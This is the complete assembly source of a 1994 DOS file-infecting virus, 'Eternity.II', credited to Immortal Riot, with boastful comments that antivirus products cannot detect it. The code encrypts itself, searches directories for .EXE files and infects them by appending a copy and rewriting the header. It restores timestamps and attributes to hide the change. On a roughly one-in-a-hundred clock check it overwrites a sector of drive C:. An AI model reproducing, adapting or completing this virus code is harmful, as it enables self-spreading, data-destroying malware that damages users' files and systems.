;		         -Eternity.II-
;      "Created by Immortal Riot's destructive development team"
;              (c) '94 The Unforgiven/Immortal Riot 
;
;       "If this virus survive into eternity, I'll live forever"
;			       or
;	              "Nothing last forever"
;
; Notes:
;  F-Prot, Scan, TBAV, Findviru, can't find shits of this virus.
;
; Disclaimer:
;  If this virus harms your computer and you kill yourself,
;  I'll not attend on nor pay for your funeral. 
;
; Dedication:
;  I dedicate this virus to all members of Dia Psalma for all
;  the ideoligical inspiration I've gained from listening on
;  their music as well as talking with them.

		.model	tiny
		.radix	16
		.code

Virus_Lenght	EQU	Virus_End-Virus_Start
		org	100

Virus_Start:
xchg ax, ax				    ; A nop to fill out the virus
mov ax,0fa01h				    ; to be exactly 600 bytes!
mov dx,5945h
int 16h

call	Get_delta			    ; Get the delta-offset!
Get_delta:
pop bp
sub bp,Get_Delta-Virus_Start

call encrypt_decrypt			    ; Decrypt the virus
jmp short encryption_start		    ; then continue..

write_virus:				    
call encrypt_decrypt			    ; Encrypt the virus
mov  ah,40	
mov  cx,Virus_Lenght
mov  dx,bp
int  21
call encrypt_decrypt			    ; Decrypt it again
ret

encryption_value dw 0
encrypt_decrypt:
lea si,cs:[bp+encryption_start-virus_start]
mov cx,(end_of_virus-encryption_start+1)/2
mov dx,word ptr cs:[bp+encryption_value-virus_start]

Xor_LoopY:
xor word ptr cs:[si],dx
inc si
inc si
loop Xor_LoopY
ret

encryption_start:			    ; Heuristic, beat this!
mov     ax,es
add	ax,10
add	ax,cs:[bp+Exe_header-Virus_Start+16]
push	ax
push	cs:[bp+Exe_header-Virus_Start+14]

push	ds
push	cs
pop	ds

mov	ah,1a				    ; Set the DTA
lea     dx,[bp+Own_dta-virus_start]
int	21

One_Percent:
mov ah,2ch				    ; 1%
int 21h
cmp dl,0
jne get_drive

Cruel:					    ; God what I hate that
mov al,2h				    ; eskimoe!
mov cx,1
lea bx,v_name
cwd
int 26h 

Get_drive:				    ; Current drive
mov ah,19h
int 21h
cmp al,2				    ; A: or B:?
jae get_dir
jmp restore_dir				    ; Yep, then don't infect 
					    ; other files that run!
Get_Dir:
mov ah,47
xor dl,dl
lea si,[bp+dir-virus_start]
int 21

Di_Counter:
xor di,di				    ; Infection counter=0
                                            ; will be inc after each infection!

_4EH:
mov	ah,4e				    ; Bummer..

Loop_Files:
lea     dx,[bp+file_match-virus_start]
int	21

jnc	clear_attribs			    ; We did find a file!
					    ; Happy Happy, joy joy!
Dot_Dott:
lea dx,[bp+dot_dot-virus_start]		    ; Ah, the same old
mov ah,3bh				    ; dot-dot-routine again!
int 21h

jnc not_root				   ; No error!
jmp no_victim_found			   ; No more files in ..

not_root:
mov ah,4e				   ; Find first file
jmp short Loop_Files			   ; in the new directory

Clear_attribs:				   ; Clear file-attrib
mov ax,4301h
xor cx,cx
lea dx,[bp+own_dta-virus_start+1eh]	   ; 1eh=filename in DTA-aera
int 21h

Open_File:
mov ax,3d02			           ; Open file in read/write mode
mov dx,Own_dta-Virus_Start+1e		   ; Yep, it's still 1eh in DTA!
add dx,bp				   ; bummer!
int 21

jnc read_File			           ; No error, then read the file!
jmp cant_open_file			   ; Hrm?!

v_name 	db "Eternity_II"             	   ; Virus name!


Read_File:
xchg ax,bx		                   ;File handle in bx

mov ah,3f		                   ;Read file - 28 bytes
mov cx,1c		                   ;to EXE_header (1ch)
lea dx,[bp+exe_header-virus_start]
int 21

jnc no_error	                           ; It worked (duh)
jmp read_error				   ; Hrm?!

no_error:
cmp byte ptr ds:[bp+Exe_header-Virus_Start],'M'
jnz no_exe	
cmp word ptr ds:[bp+Exe_header-Virus_Start+12],'RI'
jz  infected

mov  al,2				    ; File pointer
call F_Ptr				    ; to end of file

push dx
push ax

Random:
mov ah,2ch 				    ; Yah. Nearly polymorfic?
int 21h				            ; Oh well :-). 
add dl,dh
jz  random
mov word ptr cs:[bp+encryption_value-virus_start],dx   

call write_virus			   ; Write encrypted copy

mov  al,2				   ; File pointer to end of file
Call F_Ptr

mov cx,200				   ; bummer..
div cx
inc ax
mov word ptr ds:[Exe_header-Virus_Start+2+bp],dx
mov word ptr ds:[Exe_header-Virus_Start+4+bp],ax

pop ax
pop dx

mov cx,10
div cx
sub ax,word ptr ds:[Exe_header-Virus_Start+8+bp]
mov word ptr ds:[Exe_header-Virus_Start+16+bp],ax
mov word ptr ds:[Exe_header-Virus_Start+14+bp],dx
mov word ptr ds:[Exe_header-Virus_Start+12+bp],'RI'

mov  al,0				    ; File pointer to top of file
call F_Ptr

mov ah,40		                    ; Write header
mov cx,1c
lea dx,[bp+exe_header-virus_start]
int 21

jc write_error				    ; Hrm!?

no_exe:
jmp short Restore_Time_Date

infected:				    ; Decrease infection counter
dec di					    ; with one

Restore_Time_Date:			    ; Nearly stealth?
lea si,[bp+own_dta-virus_start+16h]	    ; Oh well :-).
mov cx,word ptr [si]
mov dx,word ptr [si+2]
mov ax,5701h
int 21h

Close_File:				    ; Close the file
mov ah,3e	
int 21

Set_Back_Attribs:			    ; Stealth-bomber!
mov ax,4301h
xor ch,ch
lea bx,[bp+own_dta-virus_start+15h]
mov cl,[bx]
lea dx,[bp+own_dta-virus_start+1eh]
int 21h

Sick_or_EXE:
mov ah,4f				    ; 4fh=find next file
inc di
cmp di,3				    ; Infected three files?
jae finnished_infection			    ; Yep!
jmp Loop_Files				    ; Nah!

F_Ptr:					    ; Since we're using
mov ah,42				    ; this routine
xor cx,cx				    ; three times,
cwd					    ; calling this
int 21				            ; will save us
ret					    ; some bytes

write_error:				    ; For no use in this virus,
read_error:				    ; but if something screws
cant_open_file:		                    ; up, add 09/i21h functions,  
no_victim_found:	                    ; and test what didn't work.      
finnished_infection:			    ;

Restore_Dir:				    ; More stealth..
lea dx,[bp+dir-virus_start]
mov ah,3bh
int 21

quit:					    ; Return to original program
pop	ds
retf

groupdb db "(c) '94 The Unforgiven/Immortal Riot" ; That's moi..

dot_dot		db	'..',0		    ; Another directory
file_match	db	'*.EXE',0	    ; Infect �m all!

Exe_header	db	16 DUP(0)
		dw	0fff0	
		db	4  DUP(0)
Own_Dta		db	02bh DUP(0)
dir		db 65 dup (?)		    ; Really really stupid!

Virus_End	EQU	$
end_of_virus:
		end	Virus_Start